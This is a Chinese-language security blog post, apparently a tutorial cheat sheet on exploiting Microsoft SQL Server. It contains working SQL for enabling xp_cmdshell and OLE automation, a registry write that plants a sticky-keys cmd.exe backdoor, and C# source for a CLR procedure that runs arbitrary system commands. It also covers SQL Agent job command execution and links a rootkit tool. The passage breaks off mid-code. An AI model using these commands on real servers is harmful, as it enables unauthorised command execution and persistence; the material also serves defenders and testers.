<!DOCTYPE html>
<html lang="zh-CN" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="Zh0um1" />
  <meta name="description" content="摆烂仔的摆烂记录" />
  
  
  <title>
    
      MSSQL 一般利用方式 
      
      
      |
    
     Zh0um1&#39;s Blog
  </title>

  
    <link rel="apple-touch-icon" href="/images/f.png">
    <link rel="icon" href="/images/f.png">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 6.1.0"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/a.png" alt="">
      
    </a>
    <div class="nickname"><a href="/">Zh0um1</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">Tags</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="https://cdn.jsdelivr.net/npm/clipboard@2.0.10/dist/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">MSSQL 一般利用方式</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
          2022-03-20 20:49:34
        </span>
        
              <span class="post-tags">
                <i class="iconfont icon-tags mr-10" title="标签"></i>
                
                <span class="span--tag mr-8">
                  <a href="/tags/MSSQL/" title="MSSQL">
                    #MSSQL
                  </a>
                </span>
                
              </span>
          
      </div>
      <div class="markdown-body">
        <h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>SQL Server 是 Microsoft 开发的关系数据库管理系统（RDBMS）。 它是市场上最受欢迎的 DBMS 之一。SQL Server 具有极其广泛的用途，它可以在各个方面使用,从存储个人博客的内容到存储客户数据等</p>
<p>在 2017 版之前，SQL Server 仅适用于 Windows。 SQL Server 2017 中最大的变化之一是，它现在可在 Linux 和 Docker 容器上使用。 这意味着可以在 Mac 上运行 SQL Server</p>
<h1 id="危险的存储过程"><a href="#危险的存储过程" class="headerlink" title="危险的存储过程"></a>危险的存储过程</h1><h2 id="xp-cmdshell"><a href="#xp-cmdshell" class="headerlink" title="xp_cmdshell"></a>xp_cmdshell</h2><h3 id="查询-xp-cmdshell-存储过程是否存在"><a href="#查询-xp-cmdshell-存储过程是否存在" class="headerlink" title="查询 xp_cmdshell 存储过程是否存在"></a>查询 xp_cmdshell 存储过程是否存在</h3><p>xtype 为对象类型，xtype&#x3D;’x’，表示存储过程的对象类型为扩展存储过程</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> master<span class="token punctuation">.</span>dbo<span class="token punctuation">.</span>sysobjects <span class="token keyword">where</span> xtype<span class="token operator">=</span><span class="token string">'x'</span> <span class="token operator">and</span> name<span class="token operator">=</span><span class="token string">'xp_cmdshell'</span>

<span class="token keyword">select</span> <span class="token function">count</span><span class="token punctuation">(</span><span class="token operator">*</span><span class="token punctuation">)</span> <span class="token keyword">from</span> master<span class="token punctuation">.</span>dbo<span class="token punctuation">.</span>sysobjects <span class="token keyword">where</span> xtype<span class="token operator">=</span><span class="token string">'x'</span> <span class="token operator">and</span> name<span class="token operator">=</span><span class="token string">'xp_cmdshell'</span> <span class="token comment"># 存在则返回 1</span></code></pre>

<h3 id="xp-cmdshell-的开启与关闭"><a href="#xp-cmdshell-的开启与关闭" class="headerlink" title="xp_cmdshell 的开启与关闭"></a>xp_cmdshell 的开启与关闭</h3><p>开启</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">EXEC</span> sp_configure <span class="token string">'show advanced options'</span><span class="token punctuation">,</span> <span class="token number">1</span><span class="token punctuation">;</span><span class="token keyword">RECONFIGURE</span><span class="token punctuation">;</span><span class="token keyword">EXEC</span> sp_configure <span class="token string">'xp_cmdshell'</span><span class="token punctuation">,</span> <span class="token number">1</span><span class="token punctuation">;</span><span class="token keyword">RECONFIGURE</span><span class="token punctuation">;</span></code></pre>

<p>关闭</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">EXEC</span> sp_configure <span class="token string">'show advanced options'</span><span class="token punctuation">,</span> <span class="token number">1</span><span class="token punctuation">;</span><span class="token keyword">RECONFIGURE</span><span class="token punctuation">;</span><span class="token keyword">EXEC</span> sp_configure <span class="token string">'xp_cmdshell'</span><span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">;</span><span class="token keyword">RECONFIGURE</span><span class="token punctuation">;</span></code></pre>

<h3 id="恢复-xp-cmdshell-存储过程"><a href="#恢复-xp-cmdshell-存储过程" class="headerlink" title="恢复 xp_cmdshell 存储过程"></a>恢复 xp_cmdshell 存储过程</h3><p>Error Message: 未能找到存储过程 ‘master..xp_cmdshell’，即 xp_cmdshell 被删除，恢复方式如下</p>
<p>第一步删除</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">drop</span> <span class="token keyword">procedure</span> sp_addextendedproc
<span class="token keyword">drop</span> <span class="token keyword">procedure</span> sp_oacreate
<span class="token keyword">exec</span> sp_dropextendedproc <span class="token string">'xp_cmdshell'</span></code></pre>

<p>第二步恢复</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">dbcc</span> addextendedproc<span class="token punctuation">(</span><span class="token string">"sp_oacreate"</span><span class="token punctuation">,</span><span class="token string">"odsole70.dll"</span><span class="token punctuation">)</span>
<span class="token keyword">dbcc</span> addextendedproc<span class="token punctuation">(</span><span class="token string">"xp_cmdshell"</span><span class="token punctuation">,</span><span class="token string">" "</span><span class="token punctuation">)</span></code></pre>

<p>上传 xplog70.dll，恢复扩展存储过过程 xp_cmdshell</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">dbcc</span> addextendedproc<span class="token punctuation">(</span><span class="token string">"xp_cmdshell"</span><span class="token punctuation">,</span><span class="token string">"xplog70.dll"</span><span class="token punctuation">)</span></code></pre>

<h2 id="注册表相关操作"><a href="#注册表相关操作" class="headerlink" title="注册表相关操作"></a>注册表相关操作</h2><p>SQL Server 存在一系列的存储过程，可以对注册表进行增删改查。xp_regread、xp_regwrite、xp_regdeletvalue、xp_regdeletkey、xp_regaddmultistring 等</p>
<h3 id="xp-regread-读注册表"><a href="#xp-regread-读注册表" class="headerlink" title="xp_regread 读注册表"></a>xp_regread 读注册表</h3><pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">exec</span> xp_regread <span class="token string">'HKEY_current_user'</span><span class="token punctuation">,</span><span class="token string">'Control Panel\International'</span><span class="token punctuation">,</span><span class="token string">'sCountry'</span>
<span class="token comment"># exec xp_regread [键], [子键], [键值]</span>
<span class="token keyword">exec</span> xp_regread N<span class="token string">'HKEY_LOCAL_MACHINE'</span><span class="token punctuation">,</span> N<span class="token string">'SYSTEM\CurrentControlSet\Services\MSSEARCH'</span> <span class="token comment"># 判断子健是否存在</span></code></pre>

<h3 id="xp-regaddmultistring-枚举可用的注册表键值"><a href="#xp-regaddmultistring-枚举可用的注册表键值" class="headerlink" title="xp_regaddmultistring 枚举可用的注册表键值"></a>xp_regaddmultistring 枚举可用的注册表键值</h3><pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">exec</span> xp_regenumkeys <span class="token string">'HKEY_CURRENT_USER'</span><span class="token punctuation">,</span><span class="token string">'Control Panel\International'</span></code></pre>

<h3 id="xp-regwrite-修改注册表"><a href="#xp-regwrite-修改注册表" class="headerlink" title="xp_regwrite 修改注册表"></a>xp_regwrite 修改注册表</h3><p>查看 xp_regwrite 是否启用</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">select</span> <span class="token function">count</span><span class="token punctuation">(</span><span class="token operator">*</span><span class="token punctuation">)</span> <span class="token keyword">from</span> master<span class="token punctuation">.</span>dbo<span class="token punctuation">.</span>sysobjects <span class="token keyword">where</span> xtype<span class="token operator">=</span><span class="token string">'x'</span> <span class="token operator">and</span> name<span class="token operator">=</span><span class="token string">'xp_regwrite'</span></code></pre>

<p>开启 xp_regwrite</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">EXEC</span> sp_configure <span class="token string">'show advanced options'</span><span class="token punctuation">,</span> <span class="token number">1</span>
<span class="token keyword">RECONFIGURE</span>
<span class="token keyword">EXEC</span> sp_configure <span class="token string">'xp_regwrite'</span><span class="token punctuation">,</span> <span class="token number">1</span>
<span class="token keyword">RECONFIGURE</span></code></pre>

<p>关闭 xp_regwrite</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">EXEC</span> sp_configure <span class="token string">'show advanced options'</span><span class="token punctuation">,</span> <span class="token number">1</span>
<span class="token keyword">RECONFIGURE</span>
<span class="token keyword">EXEC</span> sp_configure <span class="token string">'xp_regwrite'</span><span class="token punctuation">,</span> <span class="token number">0</span> 
<span class="token keyword">RECONFIGURE</span></code></pre>

<p>修改注册表</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">EXEC</span> xp_regwrite <span class="token variable">@rootkey</span><span class="token operator">=</span><span class="token string">'HKEY_LOCAL_MACHINE'</span><span class="token punctuation">,</span><span class="token variable">@key</span><span class="token operator">=</span><span class="token string">'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE'</span><span class="token punctuation">,</span><span class="token variable">@value_name</span><span class="token operator">=</span><span class="token string">'Debugger'</span><span class="token punctuation">,</span><span class="token variable">@type</span><span class="token operator">=</span><span class="token string">'REG_SZ'</span><span class="token punctuation">,</span><span class="token variable">@value</span><span class="token operator">=</span><span class="token string">'c:\windows\system32\cmd.exe'</span>
<span class="token comment"># 修改粘滞键的键值</span></code></pre>

<h3 id="xp-regdeletekey-删除指定注册表键值对"><a href="#xp-regdeletekey-删除指定注册表键值对" class="headerlink" title="xp_regdeletekey 删除指定注册表键值对"></a>xp_regdeletekey 删除指定注册表键值对</h3><p>删除粘滞键的键值</p>
<pre class="language-sql" data-language="sql"><code class="language-sql">xp_regdeletekey <span class="token string">'HKEY_LOCAL_MACHINE'</span><span class="token punctuation">,</span> <span class="token string">'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'</span></code></pre>

<h2 id="xp-fileexist"><a href="#xp-fileexist" class="headerlink" title="xp_fileexist"></a>xp_fileexist</h2><p>判读文件是否存在，第一列返回 0 表示文件不存在，返回 1 表示文件存在。当执行完无回显命令时，一般都将结果输入至文件中，利用此存储过程可以判断无回显命令是否执行成功</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">exec</span> xp_fileexist <span class="token string">'C:\Users\MSSQLSERVER\1.txt'</span></code></pre>

<h2 id="xp-subdirs"><a href="#xp-subdirs" class="headerlink" title="xp_subdirs"></a>xp_subdirs</h2><p>列出当前目录</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">exec</span> xp_subdirs <span class="token string">"C:\\"</span></code></pre>

<h2 id="xp-getnetname"><a href="#xp-getnetname" class="headerlink" title="xp_getnetname"></a>xp_getnetname</h2><p>获取服务器名称</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">exec</span> xp_getnetname</code></pre>

<h2 id="xp-msver"><a href="#xp-msver" class="headerlink" title="xp_msver"></a>xp_msver</h2><p>获取服务器信息</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">exec</span> xp_msver</code></pre>

<h1 id="SQL-Server-COM-组件"><a href="#SQL-Server-COM-组件" class="headerlink" title="SQL Server COM 组件"></a>SQL Server COM 组件</h1><p>SQL Server 中的 COM 组件 SP_OACREATE，执行系统命令，但是此利用方法无回显</p>
<h2 id="查询-SP-OACREATE-是否存在"><a href="#查询-SP-OACREATE-是否存在" class="headerlink" title="查询 SP_OACREATE 是否存在"></a>查询 SP_OACREATE 是否存在</h2><p>返回 1 则存在</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">select</span> <span class="token function">count</span><span class="token punctuation">(</span><span class="token operator">*</span><span class="token punctuation">)</span> <span class="token keyword">from</span> master<span class="token punctuation">.</span>dbo<span class="token punctuation">.</span>sysobjects <span class="token keyword">where</span> xtype<span class="token operator">=</span><span class="token string">'x'</span> <span class="token operator">and</span> name<span class="token operator">=</span><span class="token string">'SP_OACREATE'</span></code></pre>

<h2 id="SP-OACREATE-的开启与关闭"><a href="#SP-OACREATE-的开启与关闭" class="headerlink" title="SP_OACREATE 的开启与关闭"></a>SP_OACREATE 的开启与关闭</h2><p>开启</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">exec</span> sp_configure <span class="token string">'show advanced options'</span><span class="token punctuation">,</span> <span class="token number">1</span><span class="token punctuation">;</span> <span class="token keyword">RECONFIGURE</span> <span class="token keyword">WITH</span> OVERRIDE<span class="token punctuation">;</span>   
<span class="token keyword">exec</span> sp_configure <span class="token string">'Ole Automation Procedures'</span><span class="token punctuation">,</span> <span class="token number">1</span><span class="token punctuation">;</span> <span class="token keyword">RECONFIGURE</span> <span class="token keyword">WITH</span> OVERRIDE<span class="token punctuation">;</span></code></pre>

<p>关闭</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">exec</span> sp_configure <span class="token string">'show advanced options'</span><span class="token punctuation">,</span> <span class="token number">1</span><span class="token punctuation">;</span> <span class="token keyword">RECONFIGURE</span> <span class="token keyword">WITH</span> OVERRIDE<span class="token punctuation">;</span>   
<span class="token keyword">exec</span> sp_configure <span class="token string">'Ole Automation Procedures'</span><span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">;</span> <span class="token keyword">RECONFIGURE</span> <span class="token keyword">WITH</span> OVERRIDE<span class="token punctuation">;</span></code></pre>

<h2 id="执行系统命令"><a href="#执行系统命令" class="headerlink" title="执行系统命令"></a>执行系统命令</h2><pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">declare</span> <span class="token variable">@shell</span> <span class="token keyword">int</span> <span class="token keyword">exec</span> sp_oacreate <span class="token string">'wscript.shell'</span><span class="token punctuation">,</span><span class="token variable">@shell</span> output <span class="token keyword">exec</span> sp_oamethod <span class="token variable">@shell</span><span class="token punctuation">,</span><span class="token string">'run'</span><span class="token punctuation">,</span><span class="token boolean">null</span><span class="token punctuation">,</span><span class="token string">'C:\Windows\System32\cmd.exe /c whoami /all > C:\\Users\\MSSQLSERVER\\test.txt'</span></code></pre>

<h1 id="SQL-Server-CLR-相关利用"><a href="#SQL-Server-CLR-相关利用" class="headerlink" title="SQL Server CLR 相关利用"></a>SQL Server CLR 相关利用</h1><p>公共语言运行时 (CLR) 集成编程概念<br>从 SQL Server 2005 (9.x) 开始，SQL Server 集成了用于 Microsoft Windows 的 .NET Framework 的公共语言运行时 (CLR) 组件。 这意味着现在可以使用任何 .NET Framework 语言（包括 Microsoft Visual Basic .NET 和 Microsoft Visual C#）来编写存储过程、触发器、用户定义类型、用户定义函数、用户定义聚合和流式表值函数</p>
<p>CLR 方式可以利用 16 进制文件流方式导入 DLL 文件，不需要文件落地</p>
<p>利用步骤</p>
<ol>
<li>编写 CLR</li>
<li>启用 MSSQL CLR 功能</li>
<li>利用 SQL 语句导入程序集</li>
<li>执行系统命令</li>
</ol>
<h2 id="编写-CLR"><a href="#编写-CLR" class="headerlink" title="编写 CLR"></a>编写 CLR</h2><p>使用 Visual Studio 创建工程</p>
<p><img src="/posts/5beaca16/image-20220320205141716.png" alt="image-20220320205141716"></p>
<p>修改目标平台和勾选创建脚本，这里是 SQL Server 2014</p>
<p><img src="/posts/5beaca16/image-20220320205354905.png" alt="image-20220320205354905"></p>
<p>修改目标框架和权限级别为 UNSAFE</p>
<p><img src="/posts/5beaca16/image-20220320205406216.png" alt="image-20220320205406216"></p>
<blockquote>
<p>在 SQL Server 2005 中引入了从 MSSQL 运行.NET 代码的功能，并在后续版本中叠加了许多保护措施，来限制代码可以访问的内容。在创建.Net 程序集时，会给它们指定一个权限级别<br>其权限集有三个选项</p>
<blockquote>
<p>SAFE：基本上只将 MSSQL 数据集暴露给代码，其他大部分操作则都被禁止<br>EXTERNAL_ACCESS：允许访问底层服务器上某些资源，但不应该允许直接执行代码<br>UNSAFE：允许使用任何代码</p>
</blockquote>
</blockquote>
<p>创建 SQL CLR C# 存储过程</p>
<p><img src="/posts/5beaca16/image-20220320205413749.png" alt="image-20220320205413749"></p>
<p>代码如下</p>
<pre class="language-c#" data-language="c#"><code class="language-c#">using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using System.Diagnostics;
using System.Text;
using Microsoft.SqlServer.Server;

public partial class StoredProcedures
&#123;
    [Microsoft.SqlServer.Server.SqlProcedure]
    public static void ExecCommand (string cmd)
    &#123;
        &#x2F;&#x2F; 在此处放置代码
        SqlContext.Pipe.Send(&quot;Command is running, please wait.&quot;);
        SqlContext.Pipe.Send(RunCommand(&quot;cmd.exe&quot;, &quot; &#x2F;c &quot; + cmd));
    &#125;
    public static string RunCommand(string filename,string arguments)
    &#123;
        var process &#x3D; new Process();

        process.StartInfo.FileName &#x3D; filename;
        if (!string.IsNullOrEmpty(arguments))
        &#123;
            process.StartInfo.Arguments &#x3D; arguments;
        &#125;

        process.StartInfo.CreateNoWindow &#x3D; true;
        process.StartInfo.WindowStyle &#x3D; ProcessWindowStyle.Hidden;
        process.StartInfo.UseShellExecute &#x3D; false;

        process.StartInfo.RedirectStandardError &#x3D; true;
        process.StartInfo.RedirectStandardOutput &#x3D; true;
        var stdOutput &#x3D; new StringBuilder();
        process.OutputDataReceived +&#x3D; (sender, args) &#x3D;&gt; stdOutput.AppendLine(args.Data);
        string stdError &#x3D; null;
        try
        &#123;
            process.Start();
            process.BeginOutputReadLine();
            stdError &#x3D; process.StandardError.ReadToEnd();
            process.WaitForExit();
        &#125;
        catch (Exception e)
        &#123;
            SqlContext.Pipe.Send(e.Message);
        &#125;

        if (process.ExitCode &#x3D;&#x3D; 0)
        &#123;
            SqlContext.Pipe.Send(stdOutput.ToString());
        &#125;
        else
        &#123;
            var message &#x3D; new StringBuilder();

            if (!string.IsNullOrEmpty(stdError))
            &#123;
                message.AppendLine(stdError);
            &#125;

            if (stdOutput.Length !&#x3D; 0)
            &#123;
                message.AppendLine(&quot;Std output:&quot;);
                message.AppendLine(stdOutput.ToString());
            &#125;
            SqlContext.Pipe.Send(filename + arguments + &quot; finished with exit code &#x3D; &quot; + process.ExitCode + &quot;: &quot; + message);
        &#125;
        return stdOutput.ToString();
    &#125;
&#125;</code></pre>

<p>编译生成 DLL</p>
<p><img src="/posts/5beaca16/image-20220320205430338.png" alt="image-20220320205430338"></p>
<h2 id="启用-CLR"><a href="#启用-CLR" class="headerlink" title="启用 CLR"></a>启用 CLR</h2><h3 id="SQL-Server-2017-版本之前"><a href="#SQL-Server-2017-版本之前" class="headerlink" title="SQL Server 2017 版本之前"></a>SQL Server 2017 版本之前</h3><pre class="language-sql" data-language="sql"><code class="language-sql">sp_configure <span class="token string">'show advanced options'</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">;</span><span class="token keyword">RECONFIGURE</span><span class="token punctuation">;</span> <span class="token comment">-- 显示高级选项</span>
sp_configure <span class="token string">'clr enabled'</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">;</span><span class="token keyword">RECONFIGURE</span><span class="token punctuation">;</span> <span class="token comment">-- 启用CLR</span>
<span class="token keyword">ALTER</span> <span class="token keyword">DATABASE</span> master <span class="token keyword">SET</span> TRUSTWORTHY <span class="token keyword">ON</span><span class="token punctuation">;</span> <span class="token comment">-- 将存储.Net程序集的数据库配置为可信赖的</span></code></pre>

<h3 id="SQL-Server-2017-版本及之后"><a href="#SQL-Server-2017-版本及之后" class="headerlink" title="SQL Server 2017 版本及之后"></a>SQL Server 2017 版本及之后</h3><pre class="language-sql" data-language="sql"><code class="language-sql">sp_configure <span class="token string">'show advanced options'</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">;</span><span class="token keyword">RECONFIGURE</span><span class="token punctuation">;</span>
sp_configure <span class="token string">'clr enabled'</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">;</span><span class="token keyword">RECONFIGURE</span><span class="token punctuation">;</span>
sp_add_trusted_assembly <span class="token variable">@hash</span><span class="token operator">=</span> <span class="token operator">&lt;</span>SHA512 <span class="token keyword">of</span> DLL<span class="token operator">></span><span class="token punctuation">;</span> <span class="token comment">-- 将某程序集的SHA512哈希值添加到可信程序集列表中</span></code></pre>

<h2 id="程序集的导入和创建"><a href="#程序集的导入和创建" class="headerlink" title="程序集的导入和创建"></a>程序集的导入和创建</h2><p>通过十六进制字符串创建程序集</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">CREATE</span> ASSEMBLY clrassem <span class="token keyword">from</span> <span class="token operator">&lt;</span>HEX STRING<span class="token operator">></span> <span class="token keyword">WITH</span> PERMISSION_SET <span class="token operator">=</span> UNSAFE</code></pre>

<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">CREATE</span> ASSEMBLY <span class="token punctuation">[</span>CLR<span class="token punctuation">]</span>
  <span class="token keyword">AUTHORIZATION</span> <span class="token punctuation">[</span>dbo<span class="token punctuation">]</span>
  <span class="token keyword">FROM</span> <span class="token number">0x4d5a</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
  <span class="token keyword">WITH</span> PERMISSION_SET <span class="token operator">=</span> UNSAFE<span class="token punctuation">;</span>
GO</code></pre>

<p>创建存储过程，以从程序集运行代码</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">CREATE</span> <span class="token keyword">PROCEDURE</span> debugrun <span class="token keyword">AS</span> EXTERNAL NAME clrassem<span class="token punctuation">.</span>StoredProcedures<span class="token punctuation">.</span>runner</code></pre>

<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">CREATE</span> <span class="token keyword">PROCEDURE</span> <span class="token punctuation">[</span>dbo<span class="token punctuation">]</span><span class="token punctuation">.</span><span class="token punctuation">[</span>ExecCommand<span class="token punctuation">]</span>
<span class="token variable">@cmd</span> NVARCHAR <span class="token punctuation">(</span>MAX<span class="token punctuation">)</span>
<span class="token keyword">AS</span> EXTERNAL NAME <span class="token punctuation">[</span>CLR<span class="token punctuation">]</span><span class="token punctuation">.</span><span class="token punctuation">[</span>StoredProcedures<span class="token punctuation">]</span><span class="token punctuation">.</span><span class="token punctuation">[</span>ExecCommand<span class="token punctuation">]</span>
go</code></pre>

<h2 id="利用-CLR-执行系统命令"><a href="#利用-CLR-执行系统命令" class="headerlink" title="利用 CLR 执行系统命令"></a>利用 CLR 执行系统命令</h2><pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">exec</span> dbo<span class="token punctuation">.</span>ExecCommand <span class="token string">"whoami /all"</span></code></pre>

<h2 id="删除存储过程、程序集以及受信任的哈希值"><a href="#删除存储过程、程序集以及受信任的哈希值" class="headerlink" title="删除存储过程、程序集以及受信任的哈希值"></a>删除存储过程、程序集以及受信任的哈希值</h2><h3 id="SQL-Server-2017-之前的版本"><a href="#SQL-Server-2017-之前的版本" class="headerlink" title="SQL Server 2017 之前的版本"></a>SQL Server 2017 之前的版本</h3><pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">ALTER</span> <span class="token keyword">DATABASE</span> <span class="token operator">&lt;</span>CONNECTED <span class="token keyword">DATABASE</span><span class="token operator">></span> <span class="token keyword">SET</span> TRUSTWORTHY <span class="token keyword">OFF</span></code></pre>

<h3 id="SQL-Server-2017-及更高版本"><a href="#SQL-Server-2017-及更高版本" class="headerlink" title="SQL Server 2017 及更高版本"></a>SQL Server 2017 及更高版本</h3><pre class="language-sql" data-language="sql"><code class="language-sql">sp_drop_trusted_assembly <span class="token variable">@hash</span><span class="token operator">=</span><span class="token operator">&lt;</span>SHA512 <span class="token keyword">of</span> DLL<span class="token operator">></span></code></pre>

<h3 id="通用"><a href="#通用" class="headerlink" title="通用"></a>通用</h3><pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">DROP</span> <span class="token keyword">PROCEDURE</span> debugrun<span class="token punctuation">;</span>
<span class="token keyword">DROP</span> ASSEMBLY clrassem<span class="token punctuation">;</span>
sp_configure <span class="token string">'clr strict security'</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">;</span><span class="token keyword">RECONFIGURE</span>
sp_configure <span class="token string">'show advanced options'</span><span class="token punctuation">,</span><span class="token number">0</span><span class="token punctuation">;</span><span class="token keyword">RECONFIGURE</span></code></pre>

<h2 id="WarSQLKit"><a href="#WarSQLKit" class="headerlink" title="WarSQLKit"></a>WarSQLKit</h2><p>WarSQLKit 是一个针对 MSSQL CLR 进行利用的工具，有以下两个版本</p>
<ul>
<li>WarSQLKit 是完全版本，内置多种功能。</li>
<li>WarSQLKitMinimal 是简化版，只能执行命令。</li>
</ul>
<p>项目地址：<a target="_blank" rel="noopener" href="https://github.com/EPICROUTERSS/MSSQL-Fileless-Rootkit-WarSQLKit">https://github.com/EPICROUTERSS/MSSQL-Fileless-Rootkit-WarSQLKit</a></p>
<p>导入方式和前面差不多</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token comment"># 导入</span>
<span class="token keyword">CREATE</span> ASSEMBLY <span class="token punctuation">[</span>WarSQLKit<span class="token punctuation">]</span>
    <span class="token keyword">AUTHORIZATION</span> <span class="token punctuation">[</span>dbo<span class="token punctuation">]</span>
    <span class="token keyword">FROM</span> <span class="token number">0x4D5A</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
    <span class="token keyword">WITH</span> PERMISSION_SET <span class="token operator">=</span> UNSAFE<span class="token punctuation">;</span>
GO

<span class="token comment"># 创建</span>
<span class="token keyword">CREATE</span> <span class="token keyword">PROCEDURE</span> sp_cmdExec
<span class="token variable">@Command</span> <span class="token punctuation">[</span>nvarchar<span class="token punctuation">]</span><span class="token punctuation">(</span>max<span class="token punctuation">)</span>
<span class="token keyword">WITH</span> <span class="token keyword">EXECUTE</span> <span class="token keyword">AS</span> CALLER
<span class="token keyword">AS</span>
EXTERNAL NAME WarSQLKit<span class="token punctuation">.</span>StoredProcedures<span class="token punctuation">.</span>CmdExec
GO</code></pre>

<p>用法见 README</p>
<h1 id="SQL-Server-Agent-Job-代理执行计划任务利用"><a href="#SQL-Server-Agent-Job-代理执行计划任务利用" class="headerlink" title="SQL Server Agent Job 代理执行计划任务利用"></a>SQL Server Agent Job 代理执行计划任务利用</h1><p>SQL Server 代理是一项 Microsoft Windows 服务，它执行计划的管理任务，这些任务在 SQL Server 中称为作业</p>
<p>在 Sql Server 配置管理器，启用 SQL Server 代理，注意 Express 版本 Sql Server 是无法启用的</p>
<p>创建计划任务</p>
<pre class="language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">USE</span> msdb<span class="token punctuation">;</span> 
<span class="token keyword">EXEC</span> dbo<span class="token punctuation">.</span>sp_add_job <span class="token variable">@job_name</span> <span class="token operator">=</span> N<span class="token string">'test_powershell_job1'</span><span class="token punctuation">;</span> 
<span class="token keyword">EXEC</span> sp_add_jobstep <span class="token variable">@job_name</span> <span class="token operator">=</span> N<span class="token string">'test_powershell_job1'</span><span class="token punctuation">,</span> <span class="token variable">@step_name</span> <span class="token operator">=</span> N<span class="token string">'test_powershell_name1'</span><span class="token punctuation">,</span> <span class="token variable">@subsystem</span> <span class="token operator">=</span> N<span class="token string">'PowerShell'</span><span class="token punctuation">,</span> <span class="token variable">@command</span> <span class="token operator">=</span> N<span class="token string">'c:\windows\system32\cmd.exe /c whoami >c:\\1.txt'</span><span class="token punctuation">,</span> <span class="token variable">@retry_attempts</span> <span class="token operator">=</span> <span class="token number">1</span><span class="token punctuation">,</span> <span class="token variable">@retry_interval</span> <span class="token operator">=</span> <span class="token number">5</span> <span class="token punctuation">;</span><span class="token keyword">EXEC</span> dbo<span class="token 